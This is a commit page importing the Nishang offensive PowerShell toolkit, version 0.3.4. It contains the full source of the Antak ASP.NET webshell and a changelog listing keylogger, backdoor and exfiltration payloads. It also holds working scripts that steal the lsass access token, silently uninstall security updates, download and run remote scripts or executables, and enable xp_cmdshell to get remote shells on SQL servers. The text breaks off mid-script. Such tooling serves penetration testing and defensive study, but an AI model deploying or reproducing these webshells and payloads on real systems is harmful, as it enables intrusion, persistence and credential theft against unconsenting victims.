Commit d0cf1ec3 authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 0.3.4

parents
Antak is a webshell written in C#.Net which utilizes powershell.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%--Antak - A Webshell which utilizes powershell.--%>
<script Language="c#" runat="server">
protected override void OnInit(EventArgs e)
{
output.Text = @"Welcome to Antak - A Webshell in Powershell
Use help for more details.
Use clear to clear the screen.";
}
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void ps(object sender, System.EventArgs e)
{
string option = console.Text.ToLower();
if (option.Equals("help"))
{
output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
";
console.Text = string.Empty;
console.Focus();
}
else if (option.Equals("clear"))
{
output.Text = string.Empty;
console.Text = string.Empty;
console.Focus();
}
else
{
output.Text += "\nPS> " + console.Text + "\n" + do_ps(console.Text);
console.Text = string.Empty;
console.Focus();
}
}
void execcommand(string cmd)
{
output.Text += "PS> " + "\n" + do_ps(cmd);
console.Text = string.Empty;
console.Focus();
}
void base64encode(object sender, System.EventArgs e)
{
// Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
//http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
string contents = console.Text;
// Compress Script
MemoryStream ms = new MemoryStream();
DeflateStream cs = new DeflateStream(ms, CompressionMode.Compress);
StreamWriter sw = new StreamWriter(cs, ASCIIEncoding.ASCII);
sw.WriteLine(contents);
sw.Close();
string code = Convert.ToBase64String(ms.ToArray());
string command = "Invoke-Expression $(New-Object IO.StreamReader (" +
"$(New-Object IO.Compression.DeflateStream (" +
"$(New-Object IO.MemoryStream (," +
"$([Convert]::FromBase64String('" + code + "')))), " +
"[IO.Compression.CompressionMode]::Decompress))," +
" [Text.Encoding]::ASCII)).ReadToEnd();";
execcommand(command);
}
protected void uploadbutton_Click(object sender, EventArgs e)
{
if (upload.HasFile)
{
try
{
string filename = Path.GetFileName(upload.FileName);
upload.SaveAs(console.Text + "\\" + filename);
output.Text = "File uploaded to: " + console.Text + "\\" + filename;
}
catch (Exception ex)
{
output.Text = "Upload status: The file could not be uploaded. The following error occured: " + ex.Message;
}
}
}
protected void downloadbutton_Click(object sender, EventArgs e)
{
try
{
Response.ContentType = "application/octet-stream";
Response.AppendHeader("Content-Disposition", "attachment; filename=" + console.Text);
Response.TransmitFile(console.Text);
Response.End();
}
catch (Exception ex)
{
output.Text = ex.ToString();
}
}
</script>
<HTML>
<HEAD>
<title>Antak Webshell</title>
</HEAD>
<body bgcolor="#808080">
<div>
<form id="Form1" method="post" runat="server" style="background-color: #808080">
<div style="text-align:center; resize:vertical">
<asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
<asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
</div>
<div style="width: 1100px; text-align:center">
<asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
<asp:FileUpload ID="upload" runat="server"/>
<asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
</div>
</form>
</div>
</body>
</HTML>
\ No newline at end of file
This diff is collapsed.
This diff is collapsed.
This diff is collapsed.
0.3.5
- Added Antak Webshell.
0.3.4
- Minor improvements in StringtoBase64.ps1
- Fixed a typo in Firelistener. Client port was not being displayed.
- All the scripts could be run using "dot source" now.
- All the scripts in Nishang could be loaded into current powershell session by importing Nishang.psm1 module.
- Added new exfiltration options, POST requests to Webserver and DNS txt queries.
- Removed exfiltration support for tinypaste.
- Exfiltration options have been removed from all scripts but Backdoors and Keylogger.
- Added Nishang.psm1
- Added Do-Exfiltration.ps1.
- Added Add-Exfiltration.ps1.
- Added Invoke-Decode.ps1.
- Removed Browse_Accept_Applet.ps1
0.3.3
- Minor bug fix in Copy-VSS.ps1
- Bug fix in Keylogger.ps1. It should log keys from a remote shell now (not powershell remoting).
0.3.2.2
- Download_Execute_PS.ps1 can now download and execute a Powershell script without writing it to disk.
- Execute_OnTime.ps1 and HTTP-Backdoor.ps1 executed the payload without downloading a file to disk.
- Fixed help in Brute-Force function in Powerpreter.
- Execute-OnTime, HTTP-Backdoor and Download-Execute-PS in Powerpreter now execute powershell scripts without downloading a file to disk.
- Added Firebuster.ps1 and Firelistener.ps1
0.3.2.1
- Fixed help and function name in Brute-Force.ps1
0.3.2
- Added Persistence to Keylogger, DNS_TXT_Pwnage, Execute_OnTime, HTTP-Backdoor and Powerpreter.
- Scirpts are now arranged in different directories.
- Added Add-Persistence.ps1 and Remove-Persistence.ps1
- Fixed minor bugs in scripts which use two parameterset.
- Invoke-NinjaCopy has been removed.
0.3.1
- Pivot now accepts multiple computers as input.
- Added Use-Session to interact with sessions created using Pivot.
0.3.0
- Added Powerpreter
- Added Execute-DNSTXT-Code
- Bug fix in Create-MultipleSessions.
- Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand.
- More Changes to StringToBase64. Now a file can be converted.
- Added Copy-VSS
- Information_Gather shows output in better format now.
- Information_Gather renamed to Get-Information.
- Wait for command renamed to HTTP-Backdoor.
- Time_Execution renamed Execute-OnTime
- Invoke-PingSweep renamed to Port-Scan
- Invoke-Medusa renamed to Brute-Force
0.2.9
- Run-EXEonRemote now accepts custom arguments for the executable.
- More examples added to the Keylogger.
0.2.8
- Fixed issues while using Get-LSASecret, Get-PassHashes, Get-WLAN-Keys and Information_Gather while using with Powershell v2
0.2.7
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
- Fixed a minor bug in DNS_TXT_Pwnage.
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
- Added Get-PassHashes payload.
- Added Download-Execute-PS payload.
- The keylogger logs only fresh keys after exfiltring the keys 30 times.
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.
0.2.6
- Added Create-MultipleSessions script.
- Added Run-EXEonRemote script.
0.2.5
- Added Get-WLAN-Keys payload.
- Added Remove-Update payload.
- Fixed help in Credentials.ps1
- Minor changes in Donwload_Execute and Information_Gather.
0.2.1
- Added Execute-Command-MSSQL payload.
- Removed Get-SqlSysLogin payload
- Fixed a bug in Credentials.ps1
0.2.0
- Removed hard coded strings from DNS TXT Pwnage payload.
- Information Gather now pastes data base64 encoded, does not trigger pastebin spam filter anymore.
- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated locally or at AD, credential prompt is shown again.
- Base64ToString now asks for a file containing base64 string. To provide a string in place of file use "-IsString" parameter.
- Browse_Accept_Applet now handles prompts for both 32 bit and 64 bit Internet Explorer. The wait time for the applet to load has also been increased .
- Added Enable_DuplicateToken payload.
- Added Get-LSASecret payload.
- Added Get-SqlSysLogin payload.
- Added Invoke-Medusa payload.
- Added Invoke-PingSweep payload.
0.1.1
- Fixed a bug in Parse_Keys. The function Parse_Keys was not being called.
- Changed help in Wait_For_Command.ps1
- Fixed a bug in Wait_For_Command. $MagicString was not being used instead a fixed string was matched to the result of $checkurl
- Removed delay in the credentials payload's prompt. Now the prompt asking for credentials will keep appearing instantly if nothing is entered.
- Added CHANGELOG to repo
- Removed hard coded credentials from Credentials.ps1 :| and edited the code to accept user input.
\ No newline at end of file
<#
.SYNOPSIS
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
.DESCRIPTION
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions.
.EXAMPLE
PS > Enable-DuplicateToken
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Enable-DuplicateToken
{
[CmdletBinding()]
param()
$signature = @"
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const int TOKEN_QUERY = 0x00000008;
public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
public const int ANYSIZE_ARRAY = 1;
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES {
public LUID Luid;
public UInt32 Attributes;
}
public struct TOKEN_PRIVILEGES {
public UInt32 PrivilegeCount;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
public LUID_AND_ATTRIBUTES [] Privileges;
}
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadToken(
IntPtr PHThread,
IntPtr Token
);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle,
UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
[DllImport("kernel32.dll", ExactSpelling = true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
Write-Warning "Run the Command as an Administrator"
Break
}
Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
$adjPriv = [AdjPriv.AdjPriv]
[long]$luid = 0
$tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
$tokPriv1Luid.Count = 1
$tokPriv1Luid.Luid = $luid
$tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED
$retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)
[IntPtr]$htoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)
$tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
$retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
Break
}
$process = (Get-Process -Name lsass)
#$process.name
[IntPtr]$hlsasstoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken)
[IntPtr]$dulicateTokenHandle = [IntPtr]::Zero
$retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle)
$retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
}
}
<#
.SYNOPSIS
Nishang Payload which silently removes updates for a target machine.
.DESCRIPTION
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
.PARAMETER KBID
THE KBID of update you want to remove. All and Security are also validd.
.EXAMPLE
PS > Remove-Update All
This removes all updates from the target.
.EXAMPLE
PS > Remove-Update Security
This removes all security updates from the target.
.EXAMPLE
PS > Remove-Update KB2761226
This removes KB2761226 from the target.
.LINK
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
https://github.com/samratashok/nishang
#>
function Remove-Update {
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$KBID
)
$HotFixes = Get-HotFix
foreach ($HotFix in $HotFixes)
{
if ($KBID -eq $HotFix.HotfixId)
{
$KBID = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart"
Write-Host "Removing $KBID from the target."
Invoke-Expression $RemovalCommand
break
}
if ($KBID -match "All")
{
$KBNumber = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
Write-Host "Removing update $KBNumber from the target."
Invoke-Expression $RemovalCommand
}
if ($KBID -match "Security")
{
if ($HotFix.Description -match "Security")
{
$KBSecurity = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
Write-Host "Removing Security Update $KBSecurity from the target."
Invoke-Expression $RemovalCommand
}
}
while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0)
{
Start-Sleep 3
Write-Host "Waiting for update removal to finish ..."
}
}
}
<#
.SYNOPSIS
Nishang Payload which downloads and executes a powershell script.
.DESCRIPTION
This payload downloads a powershell script from specified URL and then executes it on the target.
.PARAMETER ScriptURL
The URL from where the powershell script would be downloaded.
.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x
.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript -nodownload
The above command does not dowload the script file to disk.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download-Execute-PS
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ScriptURL,
[Parameter(Position = 1)]
[Switch]
$nodownload
)
if ($nodownload -eq $true)
{
Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"));
}
else
{
$webclient = New-Object System.Net.WebClient
$file1 = "$env:temp\deps.ps1"
$webclient.DownloadFile($ScriptURL,"$file1")
$script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
$pastevalue
}
}
<#
.SYNOPSIS
Nishang Payload to download an executable in text format, convert it to executable and execute.
.DESCRIPTION
This payload downloads an executable in text format, converts it to executable and execute.
Use exetotext.ps1 script to change an executable to text
.PARAMETER URL
The URL from where the file would be downloaded.
.EXAMPLE
PS > Download_Execute http://example.com/file.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download_Execute
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$URL
)
$webclient = New-Object System.Net.WebClient
[string]$hexformat = $webClient.DownloadString($URL)
[Byte[]] $temp = $hexformat -split ' '
[System.IO.File]::WriteAllBytes("$env:temp\svcmondr.exe", $temp)
start-process -nonewwindow "$env:temp\svcmondr.exe"
}
<#
.SYNOPSIS
Nishang payload which could be used to execute commands remotely on a MS SQL server.
.DESCRIPTION
This payload needs a valid administrator username and password on remote SQL server.
It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell
or a cmd shell on the target.
.PARAMETER ComputerName
Enter CopmuterName or IP Address of the target SQL server.
.PARAMETER UserName
Enter a UserName for a SQL server administrator account.
.PARAMETER Password
Enter the Password for the account.
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234
.LINK
http://www.labofapenetrationtester.com/2012/12/command-execution-on-ms-sql-server-using-powershell.html
https://github.com/samratashok/nishang
.NOTES
Based mostly on the Get-TSSqlSysLogin by Niklas Goude and accompanying blog post at
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
http://www.truesec.com
#>
function Execute-Command-MSSQL {
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine= $true)]
[Alias("PSComputerName","CN","MachineName","IP","IPAddress")]
[string]
$ComputerName,
[parameter(Mandatory = $true, Position = 1)]
[string]
$UserName,
[parameter(Mandatory = $true, Position = 2)]
[string]
$Password
)
Try{
function Make-Connection ($query)
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Connection
$Command.CommandText = $query
$Reader = $Command.ExecuteReader()
$Connection.Close()
}
"Connecting to $ComputerName..."
start-sleep 3
Make-Connection "EXEC sp_configure 'show advanced options',1; RECONFIGURE;"
"`nEnabling XP_CMDSHELL...`n"
start-sleep 3
Make-Connection "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
write-host -NoNewline "Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): "
$shell = read-host
while($payload -ne "exit")
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Conne